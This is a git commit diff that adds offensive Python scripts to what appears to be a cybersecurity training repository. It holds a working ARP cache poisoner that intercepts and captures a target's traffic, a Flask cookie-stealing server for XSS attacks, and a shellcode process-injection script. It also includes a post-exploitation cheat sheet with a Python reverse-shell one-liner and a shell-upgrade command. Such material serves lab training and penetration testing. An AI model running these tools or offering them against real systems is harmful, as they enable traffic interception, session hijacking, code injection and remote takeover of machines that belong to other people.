adding scripting resources

programming_and_scripting_for_cybersecurity/exploitation/arp_cache_poisoner.py

@@ -0,0 +1,86 @@
+#!/usr/bin/env python3
+# Example script to perform an ARP cache poisoning attack using SCAPY
+# v: 0.1
+# Omar Santos @santosomar
+
+from scapy.all import *
+import os
+import signal
+import sys
+import threading
+import time
+
+#network and interface parameters
+gateway_ip = "192.168.78.1"
+target_ip = "192.168.78.123"
+packet_count = 1000
+conf.iface = "en0"
+conf.verb = 0
+
+# Once given an IP address, it will try to find a MAC address.
+def get_mac(ip_address):
+    #An alternate method is using Layer 2: resp, unans =  srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, pdst=ip_address))
+    resp, unans = sr(ARP(op=1, hwdst="ff:ff:ff:ff:ff:ff", pdst=ip_address), retry=2, timeout=10)
+    for s,r in resp:
+        return r[ARP].hwsrc
+    return None
+
+#Restore the network by reversing the ARP poison attack. Broadcast ARP Reply with
+def restore_network(gateway_ip, gateway_mac, target_ip, target_mac):
+    send(ARP(op=2, hwdst="ff:ff:ff:ff:ff:ff", pdst=gateway_ip, hwsrc=target_mac, psrc=target_ip), count=5)
+    send(ARP(op=2, hwdst="ff:ff:ff:ff:ff:ff", pdst=target_ip, hwsrc=gateway_mac, psrc=gateway_ip), count=5)
+    print("[*] Disabling IP forwarding")
+    #Disable IP Forwarding on a mac
+    os.system("sysctl -w net.inet.ip.forwarding=0")
+    #kill process on a mac
+    os.kill(os.getpid(), signal.SIGTERM)
+
+def arp_poison(gateway_ip, gateway_mac, target_ip, target_mac):
+    print("[*] Started ARP poison attack [CTRL-C to stop]")
+    try:
+        while True:
+            send(ARP(op=2, pdst=gateway_ip, hwdst=gateway_mac, psrc=target_ip))
+            send(ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=gateway_ip))
+            time.sleep(2)
+    except KeyboardInterrupt:
+        print("[*] Stopped ARP poison attack. Restoring network")
+        restore_network(gateway_ip, gateway_mac, target_ip, target_mac)
+
+
+print("[*] Starting arp_cache_poisoner")
+print("[*] Enabling IP forwarding")
+
+os.system("sysctl -w net.inet.ip.forwarding=1")
+print(f"[*] Gateway IP address: {gateway_ip}")
+print(f"[*] Target IP address: {target_ip}")
+
+gateway_mac = get_mac(gateway_ip)
+if gateway_mac is None:
+    print("[!] Unable to get gateway MAC address. Exiting..")
+    sys.exit(0)
+else:
+    print(f"[*] Gateway MAC address: {gateway_mac}")
+
+target_mac = get_mac(target_ip)
+if target_mac is None:
+    print("[!] Unable to get target MAC address. Exiting..")
+    sys.exit(0)
+else:
+    print(f"[*] Target MAC address: {target_mac}")
+
+#ARP poison thread
+poison_thread = threading.Thread(target=arp_poison, args=(gateway_ip, gateway_mac, target_ip, target_mac))
+poison_thread.start()
+
+#Collect packet captures and save it to a file
+try:
+    sniff_filter = "ip host " + target_ip
+    print(f"[*] Starting network capture. Packet Count: {packet_count}. Filter: {sniff_filter}")
+    packets = sniff(filter=sniff_filter, iface=conf.iface, count=packet_count)
+    wrpcap(target_ip + "_capture.pcap", packets)
+    print(f"[*] Stopping network capture..Restoring network")
+    restore_network(gateway_ip, gateway_mac, target_ip, target_mac)
+except KeyboardInterrupt:
+    print(f"[*] Stopping network capture..Restoring network")
+    restore_network(gateway_ip, gateway_mac, target_ip, target_mac)
+    sys.exit(0)

programming_and_scripting_for_cybersecurity/exploitation/cookie_stealer.py

@@ -0,0 +1,31 @@
+#!/usr/bin/env python3
+# This is a fairly basic Flask app / script to steal cookies 
+# It can be used as a cookie-stealer for XSS and CSRF attacks
+# This is available by default in WebSploit Labs (websploit.org)
+# Make sure that you have flask, requests, and redirect installed
+# pip3 install flask, requests, redirect
+
+from flask import Flask, request, redirect
+from datetime import datetime
+
+# Creating the instance for the Flask app
+app = Flask(__name__)
+
+#The following is the root directory of our web app
+@app.route('/')
+
+#Let's now create a function to steal the cookie and write it to a file "cookies.txt"
+def cookie():
+
+    cookie = request.args.get('c')
+    f = open("cookies.txt","a")
+    f.write(cookie + ' ' + str(datetime.now()) + '\n')
+    f.close()
+
+    # redirecting the user back to the vulnerable application
+    # change the URL to whatever application you are leveraging
+    return redirect("http://127.0.0.1:9003")
+
+# you can change the port below to whatever you want to listen it
+if __name__ == "__main__":
+    app.run(host = '0.0.0.0', port=1337)

programming_and_scripting_for_cybersecurity/exploitation/dll_injection_example.py

@@ -0,0 +1,65 @@
+#!/usr/bin/env python3
+# An example example of reflective DLL injection
+
+import sys
+from ctypes import *
+from win32com.client import GetObject
+
+if len(sys.argv) < 2:
+    print "Python code injector: ./" + sys.argv[0] + " <process to inject>"
+    sys.exit(0)
+
+proc = sys.argv[1]
+WMI = GetObject('winmgmts:')
+p = WMI.ExecQuery('select * from Win32_Process where Name="%s"' %(proc))
+if len(p) == 0:
+    print "Process " + proc + " not found, exiting!"
+    sys.exit(0)
+
+process_id = p[0].Properties_('ProcessId').Value
+
+shellcode = \
+"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64" \
+"\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e" \
+"\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60" \
+"\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b" \
+"\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01" \
+"\xee\x31\xff\x31\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d" \
+"\x01\xc7\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x01" \
+"\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01" \
+"\xe8\x89\x44\x24\x1c\x61\xc3\xb2\x08\x29\xd4\x89\xe5\x89" \
+"\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f\xff\xff\xff\x89\x45" \
+"\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52\xe8\x8e\xff\xff" \
+"\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33\x32\x2e\x64" \
+"\x68\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89\xe6\x56" \
+"\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c\x24" \
+"\x52\xe8\x5f\xff\xff\xff\x68\x58\x20\x20\x20\x68\x20\x50" \
+"\x4f\x43\x68\x63\x74\x6f\x72\x68\x49\x6e\x6a\x65\x68\x6f" \
+"\x64\x65\x20\x68\x6f\x6e\x20\x43\x68\x50\x79\x74\x68\x31" \
+"\xdb\x88\x5c\x24\x18\x89\xe3\x68\x72\x67\x58\x20\x68\x6e" \
+"\x61\x2e\x6f\x68\x6f\x72\x74\x75\x68\x72\x65\x61\x66\x68" \
+"\x2e\x61\x6e\x64\x68\x2f\x77\x77\x77\x68\x70\x73\x3a\x2f" \
+"\x68\x20\x68\x74\x74\x68\x72\x67\x20\x2d\x68\x6e\x61\x2e" \
+"\x6f\x68\x6f\x72\x74\x75\x68\x72\x65\x61\x66\x68\x40\x61" \
+"\x6e\x64\x68\x64\x72\x65\x61\x68\x2d\x20\x61\x6e\x68\x75" \
+"\x6e\x61\x20\x68\x46\x6f\x72\x74\x68\x72\x65\x61\x20\x68" \
+"\x20\x41\x6e\x64\x68\x64\x20\x62\x79\x68\x6c\x6f\x70\x65" \
+"\x68\x64\x65\x76\x65\x68\x64\x6c\x79\x20\x68\x50\x72\x6f" \
+"\x75\x31\xc9\x88\x4c\x24\x5e\x89\xe1\x31\xd2\x52\x53\x51" \
+"\x52\xff\xd0\x31\xc0\x50\xff\x55\x08"
+
+
+process_handle = windll.kernel32.OpenProcess(0x1F0FFF, False, process_id)
+
+if not process_handle:
+    print "Couldn't acquire a handle to PID: %s" % process_id
+    sys.exit(0)
+
+memory_allocation_variable = windll.kernel32.VirtualAllocEx(process_handle, 0, len(shellcode), 0x00001000, 0x40)
+windll.kernel32.WriteProcessMemory(process_handle, memory_allocation_variable, shellcode, len(shellcode), 0)
+
+if not windll.kernel32.CreateRemoteThread(process_handle, None, 0, memory_allocation_variable, 0, 0, 0):
+	print "Failed to inject shellcode. Exiting."
+	sys.exit(0)
+
+print "Remote thread created!"

programming_and_scripting_for_cybersecurity/exploitation/pyshark_example.py

@@ -0,0 +1,15 @@
+#!/usr/bin/python
+# Author: Omar Santos @santosomar
+# version 1.0
+# This is a quick demonstration on how to use the python pyshark library
+#   * Pre-requisite: pyshark python library.
+#   * Install it with pip install pyshark
+# PyShark is a Python wrapper for tshark,
+# allowing python packet parsing using wireshark dissectors.
+#####################################################################
+
+import pyshark
+
+capture = pyshark.LiveCapture(interface='eth0')
+for packet in capture.sniff_continuously(packet_count=5):
+    print ('You just captured a packet:', packet)

programming_and_scripting_for_cybersecurity/exploitation/python_cool_tricks.md

@@ -0,0 +1,56 @@
+# Cool Python Tricks
+
+## Starting a quick web server to serve some files (useful for post exploitation)
+
+### In Python 2.x
+```
+python -m SimpleHTTPServer 1337
+```
+
+### In Python 3.x
+```
+python3 -m http.server 1337
+```
+
+----
+## Pythonic Web Client
+
+### In Python 2.x
+```
+python -c 'import urllib2; print urllib2.urlopen("http://h4cker.org/web").read()' | tee /tmp/file.html
+```
+
+### In Python 3.x
+```
+python3 -c 'import urllib.request; urllib.request.urlretrieve ("http://h4cker.org/web","/tmp/h4cker.html")'
+```
+
+----
+## Python Debugger
+This imports a Python file and runs the debugger automatically. This is useful for debugging Python-based malware and for post-exploitation.
+
+```
+python -m pdb <some_python_file>
+```
+
+Refer to this [Python Debugger cheatsheet](https://kapeli.com/cheat_sheets/Python_Debugger.docset/Contents/Resources/Documents/index) if you are not familiar with the Python Debugger.
+
+----
+
+## Shell to Terminal
+This is useful after exploitation and getting a shell. It allows you to use Linux commands that require a terminal session (e.g., su, sudo, vi, etc.)
+
+```
+python -c 'import pty; pty.spawn("/bin/bash")'
+```
+
+----
+
+## Using Python to do a Reverse Shell
+
+You put your IP address (instead of 192.168.78.205) and the port (instead of 13337) below:
+
+```
+python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.78.205",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
+```
+